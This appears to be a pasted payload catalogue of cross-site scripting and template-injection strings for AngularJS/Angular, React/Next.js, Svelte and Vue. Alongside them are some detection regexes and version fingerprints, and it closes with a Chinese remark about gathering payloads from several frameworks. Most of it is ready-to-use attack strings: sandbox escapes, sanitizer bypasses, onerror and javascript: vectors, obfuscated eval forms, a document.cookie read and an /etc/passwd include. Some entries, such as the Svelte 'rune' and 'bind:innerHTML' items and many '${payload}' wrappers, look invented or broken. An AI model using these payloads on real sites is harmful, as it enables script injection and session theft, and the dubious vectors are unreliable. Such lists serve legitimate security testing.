Angular Payload
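---
# AngularJS / Angular template-injection and XSS test strings, grouped by
# framework generation and technique, followed by detection/fingerprint rules.
# The original listing had every key at column 0, which turns each parent
# key (`angularjs:`, `angular:`, ...) into null and lets repeated key names
# silently overwrite each other (last wins); nesting is reconstructed here.
# `${payload}` appears to be a placeholder substituted by the consuming tool;
# it is not defined on this page — confirm before relying on it.
angularjs:
  # AngularJS sandbox-escape techniques
  sandbox_escape:
    - "{{constructor.constructor('alert(1)')()}}"
    - "{{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value, 'alert(1)' )() }}"
    - "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].__proto__,a).value, 'alert(1)')()}}"
  # Unsafe scope-method calls
  unsafe_methods:
    - "$eval('alert(1)')"
    - "$evalAsync('alert(1)')"
    - "$apply('alert(1)')"
  # Filter abuse
  filter_exploit:
    - "{{'a'|orderBy:'alert(1)'}}"
    - "{{'a'| filter: 'x=alert(1)'}}"

angular:
  # Security-context bypass
  sanitizer_bypass:
    - "bypassSecurityTrustHtml('<img src=x onerror=alert(1)>')"
    - "bypassSecurityTrustScript('alert(1)')"
    - "bypassSecurityTrustUrl('javascript:alert(1)')"
  # Template injection
  template_injection:
    - "<div [innerHTML]='${payload}'></div>"
    - "<div innerHTML='{{ ${payload} }}'></div>"
    - "<script type='text/ng-template'>${payload}</script>"
  # Zone.js related
  zone_js_exploits:
    - "Zone.current.fork({}).run(() => { ${payload} })"
    - "NgZone.runOutsideAngular(() => { ${payload} })"
  # Server-side rendering (SSR)
  ssr_attack:
    - "</xmp><script>alert(1)</script>"
    - "<div>{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1') }}</div>"
  # Attribute binding
  attribute_binding:
    - "<a [attr.href]='${payload}'>click</a>"
    - "<img [attr.src]='${payload}'>"
  # Event binding
  event_binding:
    - "<button (click)='${payload}'>"
    - "<div (mouseover)='${payload}'>"
  # Newer patterns (Angular 12+)
  modern_exploits:
    - "{{ $any({}).constructor.constructor('alert(1)')() }}"
    - "<iframe [srcdoc]='${payload}'></iframe>"
    - "<object [data]='${payload}'></object>"
  # Dependency-injection abuse
  dependency_injection:
    - "constructor(private sanitizer: DomSanitizer) { sanitizer.bypassSecurityTrustHtml(${payload}) }"
    - "@Injectable({ providedIn: 'root' }) class ExploitService { constructor() { ${payload} }"
  # Server-side template injection
  ssti:
    - "{{ 7 * 7 }}<%= 7 * 7 %>"
    - "{{ config.__proto__.ENV = {}; ${payload} }}"

# Encoding / obfuscation strategies
encoding_strategies:
  angular_specific:
    # Template-expression obfuscation
    - "{{ 'a'.constructor.prototype.charAt=[].join; $eval('x=${payload}') }}"
    # Unicode escapes; YAML double quotes decode this to `{{ alert(1) }}`
    - "\u007B\u007B alert(1) \u007D\u007D"
    # Character insertion
    - "{{ 'a'|orderBy:'al'%2b'ert(1)' }}"
    # Mixed encoding
    - "<div [innerHTML]='${payload|base64}'></div>"

# Context-sensitive detection rules (defensive side of the catalogue)
context_rules:
  template_expression:
    detection_patterns:
      - "\\{\\{.*\\}\\}"
      # Fixed: the original `\\[\\(].*=` became the regex `\[\(].*=`, which
      # only matches the literal text `[(]` followed by `=`. Judging by the
      # key name this is meant to flag `[prop]=` and `(event)=` bindings,
      # which needs a character class.
      - "[\\[(].*="
    injection_points:
      - "innerHTML"
      - "href"
      - "style"
  security_sensitive:
    dangerous_methods:
      - "bypassSecurityTrust"
      - "renderer2.createElement"
      - "ElementRef.nativeElement"

# Version fingerprinting
version_detection:
  angularjs_signatures:
    - "ng-app"
    - "data-ng-"
    - "ng-controller"
  angular_signatures:
    - "platformBrowserDynamic"
    - "@Component"
    - "CommonModule"
  version_patterns:
    - "X-Powered-By: Angular"
    # Single-quoted so the backslashes are stored verbatim (the original
    # plain scalar also parsed, but quoting makes the intent explicit)
    - '/angular\/(\d+\.\d+\.\d+)/'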
React Payload
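---
# React / Next.js injection test strings, grouped by component style and
# technique. The original listing had every key at column 0, which turns
# each parent key (`react_class:`, `react_hooks:`, ...) into null; nesting
# is reconstructed here. `${payload}` appears to be a placeholder filled in
# by the consuming tool; it is not defined on this page — confirm before use.
react_class:
  # Class-component patterns
  dangerously_set_innerhtml:
    - "{ __html: '<img src=x onerror=${payload}>' }"
    - "{ __html: '<svg onload=${payload}>' }"
    - "{ __html: '<iframe srcdoc=\"${payload}\">' }"
  lifecycle_injection:
    - "componentDidMount() { ${payload} }"
    - "UNSAFE_componentWillReceiveProps() { ${payload} }"
  ref_manipulation:
    - "this.myRef.current.innerHTML = ${payload}"
    - "ReactDOM.findDOMNode(this).innerHTML = ${payload}"

react_hooks:
  # Function-component hooks
  useEffect_exploit:
    - "useEffect(() => { ${payload} }, [])"
    - "useLayoutEffect(() => { ${payload} }, [])"
  useRef_dom_injection:
    - "const ref = useRef(); ref.current.innerHTML = ${payload}"
    - "useImperativeHandle(ref, () => ({ exec: () => ${payload} }))"
  state_callback:
    - "setState(() => { ${payload} })"
    - "useState(() => { ${payload} })"

jsx_injection:
  # JSX expression injection points
  expression_escape:
    - "{${payload}}"
    - "{JSON.stringify({ data: ${payload} })}"
  attribute_injection:
    - "style={{ color: ${payload} }}"
    - "className={${payload}}"
    - "data-payload={${payload}}"
  spread_operator:
    - "{...${payload}}"
    - "<div {...${payload}} />"

nextjs:
  # Next.js specific
  server_components:
    - "'use client'; ${payload}"
    - "export default function Page() { return (${payload}) }"
  getServerSideProps:
    - "export async function getServerSideProps() { ${payload} }"
    - "export const getStaticProps = () => { ${payload} }"
  edge_runtime:
    - "export const config = { runtime: 'edge' }; ${payload}"

advanced:
  # Advanced bypass techniques
  prototype_pollution:
    - "Object.prototype.innerHTML = ${payload}"
    - "this.__proto__.render = () => ${payload}"
  jsx_function_exec:
    - "{(_ => ${payload})()}"
    - "{(() => ${payload})()}"
  unicode_smuggling:
    - "{\\u0061lert(1)}"
    - "{['\\x61\\x6c\\x65\\x72\\x74'](1)}"
  jsfuck_encoded:
    - "{(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]}"

legacy:
  # Older React APIs
  string_refs:
    - "ref='${payload}'"
    - "this.refs.${payload}.innerHTML = ''"
  react_create_element:
    - "React.createElement('div', { dangerouslySetInnerHTML: { __html: ${payload} }})"
    - "ReactDOM.render(${payload}, document.body)"

# Hybrid attack vectors
polyglot:
  hybrid_vectors:
    - "');alert(1);('"  # closes the surrounding expression
    - "${payload} || alert(1)"
    - "typeof ${payload} === 'function' && ${payload}()"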
Svelte Payload
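---
# Svelte 3/4 injection test strings plus generic bypass and obfuscation
# strings. The original listing had every key at column 0, which turns each
# parent key (`svelte3:`, `svelte4:`, `common:`, ...) into null; nesting is
# reconstructed here. `${payload}` appears to be a placeholder filled in by
# the consuming tool; it is not defined on this page — confirm before use.
svelte3:
  # Template-injection vectors
  template_injection:
    - "{@html '<img src=x onerror=alert(1)>'}"
    - "{@html decodeURIComponent('%3Cscript%3Ealert(1)%3C/script%3E')}"
    - "<div>{@html unsafeVariable}</div>"
  # Event-handler abuse
  event_handlers:
    - "on:click={() => alert(1)}"
    - "on:mouseover={e => prompt(1)}"
    - "on:load={event => new Function('alert(1)')()}"
  # Attribute-binding bypass
  attribute_binding:
    - "<a href={javascript:alert(1)}>click</a>"
    - "<iframe srcdoc={unescapedHTML}>"
    - "<div bind:innerHTML={maliciousContent}></div>"
  # Dynamic components
  dynamic_components:
    - "<svelte:component this={componentWithXSS}/>"
    - "<svelte:window on:keydown={handleKey}/>"
    - "<svelte:body on:click={executePayload}/>"
  # Store abuse
  store_exploits:
    - "$store.subscribe(value => eval(value))"
    - "writable('alert(1)').update(v => eval(v))"
    - "derived(stores, values => new Function(values))"

svelte4:
  # Newer-feature abuse
  reactivity_bypass:
    - "$effect(() => { ${payload} })"
    - "$derived(() => { eval(inputValue) })"
    - "<script rune> let { pwn = alert(1) } = $props() </script>"
  # Server-side rendering (SSR)
  ssr_vectors:
    - "{@html '<%%>'}<!--#include virtual=\"/etc/passwd\"-->"
    - "<div data-sveltekit-fetched='javascript:alert(1)'></div>"
    - "<svelte:head><!--{ '-->' + payload + '<!--' }--></svelte:head>"
  # Compile-time features
  compile_time:
    - "<script context='module'>window.__payload = 'alert(1)'</script>"
    - "<!--svelte-ignore a11y-click-events-have-key-events-->"
    - "<div on:click={unsafeHandler}></div>"

# Generic bypass techniques
common:
  # Encoded / obfuscated forms
  encoded_payloads:
    - "JaVaScRiPt:alert(1)"
    - "data:text/html;charset=utf-8,<script>parent.alert(1)</script>"
    - "javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
  # DOM clobbering / manipulation
  dom_manipulation:
    - "<script>document.currentScript.parentElement.innerHTML = '<img src=x onerror=alert(1)>'</script>"
    - "<svelte:self let:props><script>props.execute()</script></svelte:self>"
  # Asynchronous execution
  async_execution:
    - "setTimeout(() => alert(1), 500)"
    - "requestIdleCallback(() => { ${payload} })"
    - "new SharedWorker('data:application/javascript,alert(1)')"

# Context-sensitive strings
context_sensitive:
  html_element:
    - "<script>console.log`${document.cookie}`</script>"
    - "<style>@import url(javascript:alert(1));</style>"
  attribute_context:
    - "javascript:import('data:text/javascript,alert(1)')"
    - "data:text/svelte,<svelte:options accessors/><script>export let pwn=alert(1);</script>"
  template_literals:
    - "`${alert(1)}`"
    - "new Function`alert\\x28document.domain\\x29`"

# Advanced obfuscation
advanced_obfuscation:
  unicode_smuggling:
    - "\u0061\u006c\u0065\u0072\u0074(1)"
    - "<\u0073cript>alert(1)</script>"
  comment_bypass:
    - "<!-- --><script>alert(1)</script><!-- -->"
    - "/**/eval/**/(atob('YWxlcnQoMSk='))/**/"
  chunked_encoding:
    - "<scri%0apt>aler%0at(1)</script>"
    - "<svelte%3Acomponent this=window['al'+'ert']/>"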
Vue Payload
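---
# Vue 2/3 and ecosystem (Router, Vuex, Nuxt, VuePress) injection test strings.
# The original listing had every key at column 0, which turns each parent
# key (`vue2:`, `directives:`, `vue3:`, ...) into null; nesting is
# reconstructed here (the placement of the non-`vue2`/`vue3` groups as
# top-level keys is a best guess). `${payload}` appears to be a placeholder
# filled in by the consuming tool; it is not defined on this page — confirm
# before use.
vue2:
  template_injection:
    - "{{ _c.escape(_s(${payload})) }}"  # escape-function bypass
    - "{{ constructor.constructor('alert(1)')() }}"  # constructor chain
    - "{{ _vm.$options.methods.__proto__.x = ${payload} }}"  # prototype pollution
  directives:
    v_html:
      - "<div v-html='_c.escape(_s(${payload}))'></div>"  # v-html directive bypass
      - "<component :is='${payload}'></component>"  # dynamic component injection
    v_bind:
      - ":href='javascript:alert(1)'"  # javascript: protocol binding
      - ":style='{color: ${payload}}'"  # CSS injection
  event_handlers:
    - "@click='${payload}'"  # click-event injection
    - "@mouseover=\"${payload}\""  # double-quoted handler variant
    - "v-on:focus='new Function(${payload})'"  # dynamic Function construction
  filter_exploits:
    - "{{ 'alert(1)' | filterFunction }}"  # filter argument injection
    - "{{ _vm.$options.filters.__proto__.x = ${payload} }}"  # filter prototype pollution
  ssr:
    - "{{#with this}}<script>${payload}</script>{{/with}}"  # Mustache template injection
    - "<% ${payload} %>"  # server-side template injection

vue3:
  composition_api:
    setup_script:
      - "<script setup>${payload}</script>"  # <script setup> injection
      - "const exploit = () => eval(${payload})"  # arrow-function variant
    reactivity:
      - "ref(${payload})"  # reactive-object injection
      - "window.__vue_app__.config.globalProperties.${payload}"  # global-property pollution
    renderer:
      - "createRenderer({ patchProp: ${payload} })"  # renderer hook hijack
      - "h('div', { innerHTML: ${payload} })"  # VNode injection
  modern_features:
    suspense:
      - "<Suspense><template #default>${payload}</template></Suspense>"
    teleport:
      - "<Teleport to='body'>${payload}</Teleport>"

ecosystem:
  vue_router:
    - "router.beforeEach((${payload}) => {})"  # navigation-guard injection
    - "this.$router.addRoutes([{ component: ${payload} }])"
  vuex:
    - "store.subscribeAction({ after: ${payload} })"  # action-subscription abuse
    - "this.$store._modules.root._rawModule.actions = ${payload}"

advanced_obfuscation:
  unicode_escape:
    - "\\u0061\\u006c\\u0065\\u0072\\u0074(1)"  # unicode-escaped alert
    - "\\x61\\x6c\\x65\\x72\\x74(1)"  # hex-escaped alert
  string_concat:
    # Quoted as a whole: the original `"aler" + "t(1)"` was a YAML syntax
    # error (content after a closed double-quoted scalar)
    - '"aler" + "t(1)"'
    - "window['al' + 'ert'](1)"
  template_literals:
    - "alert`1`"
    - "window[`al${'ert'}`](1)"

dependency_injection:
  provide_inject:
    - "provide('xss', ${payload})"  # provide side
    - "inject('xss')"  # inject side
  plugin_abuse:
    - "app.use({ install: ${payload} })"  # plugin install hook
    - "app.mixin({ created: ${payload} })"  # global mixin

server_side:
  nuxt_ssr:
    - "<%= ${payload} %>"  # Nuxt server template
    - "useAsyncData(() => ${payload})"  # async-data injection
  vuepress:
    - "{{ $page.${payload} }}"  # theme-variable injection
    - "<ClientOnly>${payload}</ClientOnly>"  # client-only injection point

defense_evasion:
  sanitizer_bypass:
    - "{{ decodeURIComponent(${payload}) }}"  # decode-function bypass
    - "<div v-html='bypassSanitization(${payload})'></div>"
  sandbox_escape:
    - "with(this){${payload}}"  # with-statement escape
    - "Object.defineProperty(this, 'x', { value: ${payload} })"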
最近时间安排比较紧张,整合了各种框架的payload。